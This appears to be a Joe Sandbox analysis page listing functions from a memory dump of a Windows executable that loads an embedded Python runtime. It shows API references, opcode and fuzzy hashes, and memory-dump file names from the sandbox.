Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
Instruction ID: b97b162001098a0d3c7c2f4c1fd85375abab0d468968d46d8b3b1a7ebc7ab250
Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
Instruction Fuzzy Hash: B921AC36A167069AEB249F78C4412EC33A0FB44318F5406BAD72C86BC9EF38D486CB50

Function 00007FF6900252A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF690025209

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction ID: 984a404bb94b954902b41c485cb409979f1ab9b72b582eb637424909e4a71bb4
Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction Fuzzy Hash: 6E117221E1D68191EA709F69940027EA2A4FF96B80F4444B1EF4CD7BDECF3CD9568744

Function 00007FF690035664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF690035687

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction ID: b3a918e02be0fa1d3108c34ee9a8faed2bcfedea0e2400f2a863cdcc12a80b37
Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction Fuzzy Hash: 86219232A18A8296DB728F28E44177976A0EB98B95F544234EA5DC77EDDF3CD401CB00

Function 00007FF69001F6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69001F730

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction ID: 0e9434739f93ba86557cd647b26fb1fdb4877b31e6c570a190ab573cdf57f280
Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction Fuzzy Hash: 0501C021A0C78251EA64DB769900079A6A5FF95FE4F4846B1EE6C93BDEDF3CE5028300

Function 00007FF69002720C Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69002724A

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
Instruction ID: 1747a42b1977428d387b5c706ccc80086b40d600f1935b0e445f9fda16467a8b
Opcode Fuzzy Hash: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
Instruction Fuzzy Hash: 6D015220E0D683A1FEB4AB7A65421792290EF55794F5445F8FA6CC2BCEDF3CE4868211

Function 00007FF690027548 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF690027561

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
Instruction ID: bce0b59ecb6e58c42e6a028695a7a011ec7e93b2c32a09db9b0b7ffdd144eaf4
Opcode Fuzzy Hash: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
Instruction Fuzzy Hash: 03E01290E4864762FA35BABC49C327D9150EF64350F8040B4D90CC63CFDD5CF89B9621

Function 00007FF69002DEA8 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF69002A63A,?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A), ref: 00007FF69002DEFD

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
Instruction ID: d6dc1a38befb50bf0805b29f24de0a57b3cde77dc6b4072df292dc8cca5dc007
Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
Instruction Fuzzy Hash: 2FF09654F09347A0FE75677A59513B51291DF58B40F4C40B2D90ECA7CEDD1CE9478210

Function 00007FF69002C90C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF69001FFB0,?,?,?,00007FF69002161A,?,?,?,?,?,00007FF690022E09), ref: 00007FF69002C94A

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction ID: 08999c98d486a7a6c1b3ea8ee17394ec9f43ee3abe5a5cc644e4f4fca7e2f6ad
Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction Fuzzy Hash: 4FF01C11F19287A5FE7567BA5859B791280DF88BA0F4846B0DD2EC67CDDE2CE5828210

Non-executed Functions

Function 00007FF69001C44C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF69001C468
RtlCaptureContext.KERNEL32 ref: 00007FF69001C495
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF69001C4AF
RtlVirtualUnwind.KERNEL32 ref: 00007FF69001C4F0
IsDebuggerPresent.KERNEL32 ref: 00007FF69001C544
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF69001C561
UnhandledExceptionFilter.KERNEL32 ref: 00007FF69001C56C

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
Instruction ID: 6e3b296df5b792b3ce2b770a0103b577d5eee7f756f0895939c08f0f5dc19ae8
Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
Instruction Fuzzy Hash: 23312A72608A8196EB709F64E890BEE7361FB88748F04417ADB4D87B99DF38D548C710

Function 00007FF6900129E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF69001342E,?,00007FF690013534), ref: 00007FF690012A14
FormatMessageW.KERNEL32(?,?,?,00007FF69001342E), ref: 00007FF690012A7D
MessageBoxW.USER32 ref: 00007FF690012ACF

Strings

%ls%ls: %ls, xrefs: 00007FF690012A96
<FormatMessageW failed.>, xrefs: 00007FF690012A83
Error, xrefs: 00007FF690012ABE

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Message$ErrorFormatLast
String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
API String ID: 3971115935-1149178304
Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
Instruction ID: f7e6f0c8486276df5c64299267a43f10cd3c0e44f38c4daa40fc890f1ce665e7
Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
Instruction Fuzzy Hash: 34212172618A85A2E7319B20F4506EA7365FB88788F400136EBCD93B9CDF7CD5468B40

Function 00007FF690034F10 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF690034F55

Part of subcall function 00007FF6900348A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6900348BC

Part of subcall function 00007FF690029C58: RtlFreeHeap.NTDLL(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C6E
Part of subcall function 00007FF690029C58: GetLastError.KERNEL32(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C78

Part of subcall function 00007FF690029C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF690029BEF,?,?,?,?,?,00007FF690029ADA), ref: 00007FF690029C19
Part of subcall function 00007FF690029C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF690029BEF,?,?,?,?,?,00007FF690029ADA), ref: 00007FF690029C3E

_get_daylight.LIBCMT ref: 00007FF690034F44

Part of subcall function 00007FF690034908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69003491C

_get_daylight.LIBCMT ref: 00007FF6900351BA
_get_daylight.LIBCMT ref: 00007FF6900351CB
_get_daylight.LIBCMT ref: 00007FF6900351DC
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69003541C), ref: 00007FF690035203

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
Instruction ID: 8ee1f5a5fa18e315eaa4c09cd2f6a4207f63ac7a416a9c4f7edcc726ab730b38
Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
Instruction Fuzzy Hash: EFD1CD26E08242A6EB35AF36D850ABD63A1EF89784F444076EA0DC7B9DDF3CE441C740

Function 00007FF690029924 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF69002999D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6900299B5
RtlVirtualUnwind.KERNEL32 ref: 00007FF6900299F0
IsDebuggerPresent.KERNEL32 ref: 00007FF690029A29
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF690029A33
UnhandledExceptionFilter.KERNEL32 ref: 00007FF690029A3E

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
Instruction ID: 7571340e09dacc5694d6e7fe316bb15b811628a7ed369b3f96eaa17f06741a37
Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
Instruction Fuzzy Hash: 24314E36A18B8196DB60CF39E8406AE73A4FB88758F540275EA9D87B99DF3CD145CB00

Function 00007FF690030B84 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF690030BD0
FindFirstFileExW.KERNEL32 ref: 00007FF690030CDA

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
Instruction ID: 78469d1220ff25ba6e4145801ff1408b35cefc5135df6680f8017bc7bc318677
Opcode Fuzzy Hash: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
Instruction Fuzzy Hash: 5BB1F322B1A69291EA72DB75D420ABD63A0EB48BE4F445171EE5E87BCDDF3CE451C300

Function 00007FF69003518C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6900351BA

Part of subcall function 00007FF690034908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69003491C

_get_daylight.LIBCMT ref: 00007FF6900351CB

Part of subcall function 00007FF6900348A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6900348BC

_get_daylight.LIBCMT ref: 00007FF6900351DC

Part of subcall function 00007FF6900348D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6900348EC

Part of subcall function 00007FF690029C58: RtlFreeHeap.NTDLL(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C6E
Part of subcall function 00007FF690029C58: GetLastError.KERNEL32(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C78

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69003541C), ref: 00007FF690035203

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
Instruction ID: 7d8dc545302b253465d7f88f5baa9e1cf3cbb23d1cbadd4d9b2b296aa1b6f2ab
Opcode Fuzzy Hash: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
Instruction Fuzzy Hash: 5F517A36E18642A6E731DF32E8909A977A0FB49784F4045B5EA0DC77AADF3CE441C740

Function 00007FF6900150B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF6900150C0
GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF690015101
GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF690015126
GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF69001514B
GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF690015173
GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF69001519B
GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF6900151C3
GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF6900151EB
GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF690015213

Strings

GetProcAddress, xrefs: 00007FF6900150E0
Py_Finalize, xrefs: 00007FF690015141, 00007FF69001515D
PyMem_RawFree, xrefs: 00007FF6900154B1, 00007FF6900154CD
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF6900155C9, 00007FF6900155E5
Py_InitializeFromConfig, xrefs: 00007FF690015169, 00007FF690015185
PyConfig_SetWideStringList, xrefs: 00007FF6900152A9, 00007FF6900152C5
PyConfig_SetBytesString, xrefs: 00007FF690015259, 00007FF690015275
PyConfig_InitIsolatedConfig, xrefs: 00007FF690015209, 00007FF690015225
Py_ExitStatusException, xrefs: 00007FF69001511C, 00007FF690015138
PyList_Append, xrefs: 00007FF690015461, 00007FF69001547D
PySys_GetObject, xrefs: 00007FF690015641, 00007FF69001565D
PyConfig_Clear, xrefs: 00007FF6900151E1, 00007FF6900151FD
PyErr_Restore, xrefs: 00007FF690015399, 00007FF6900153B5
PyImport_ImportModule, xrefs: 00007FF690015439, 00007FF690015455
PyRun_SimpleStringFlags, xrefs: 00007FF6900155F1, 00007FF69001560D
PyEval_EvalCode, xrefs: 00007FF6900153C1, 00007FF6900153DD
PyImport_ExecCodeModule, xrefs: 00007FF690015411, 00007FF69001542D
PyObject_GetAttrString, xrefs: 00007FF690015551, 00007FF69001556D
Py_DecodeLocale, xrefs: 00007FF6900150F7, 00007FF690015113
PyUnicode_FromFormat, xrefs: 00007FF690015709, 00007FF690015725
PyImport_AddModule, xrefs: 00007FF6900153E9, 00007FF690015405
PyObject_CallFunction, xrefs: 00007FF690015501, 00007FF69001551D
PyUnicode_DecodeFSDefault, xrefs: 00007FF6900156E1, 00007FF6900156FD
PyUnicode_Join, xrefs: 00007FF690015759, 00007FF690015775
PyConfig_SetString, xrefs: 00007FF690015281, 00007FF69001529D
Failed to get address for %hs, xrefs: 00007FF6900150D9
Py_PreInitialize, xrefs: 00007FF6900151B9, 00007FF6900151D5
PyErr_NormalizeException, xrefs: 00007FF690015321, 00007FF69001533D
PyUnicode_FromString, xrefs: 00007FF690015731, 00007FF69001574D
Py_DecRef, xrefs: 00007FF6900150B6, 00007FF6900150D2
PyObject_Str, xrefs: 00007FF6900155A1, 00007FF6900155BD
PyStatus_Exception, xrefs: 00007FF690015619, 00007FF690015635
PyErr_Print, xrefs: 00007FF690015371, 00007FF69001538D
PyObject_SetAttrString, xrefs: 00007FF690015579, 00007FF690015595
PyConfig_Read, xrefs: 00007FF690015231, 00007FF69001524D
PyErr_Fetch, xrefs: 00007FF6900152F9, 00007FF690015315
PyUnicode_Replace, xrefs: 00007FF690015781, 00007FF69001579D
PyMarshal_ReadObjectFromString, xrefs: 00007FF690015489, 00007FF6900154A5
PyUnicode_AsUTF8, xrefs: 00007FF690015691, 00007FF6900156AD
PyModule_GetDict, xrefs: 00007FF6900154D9, 00007FF6900154F5
PySys_SetObject, xrefs: 00007FF690015669, 00007FF690015685
Py_IsInitialized, xrefs: 00007FF690015191, 00007FF6900151AD
PyErr_Clear, xrefs: 00007FF6900152D1, 00007FF6900152ED
PyUnicode_Decode, xrefs: 00007FF6900156B9, 00007FF6900156D5
PyErr_Occurred, xrefs: 00007FF690015349, 00007FF690015365
PyObject_CallFunctionObjArgs, xrefs: 00007FF690015529, 00007FF690015545

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for 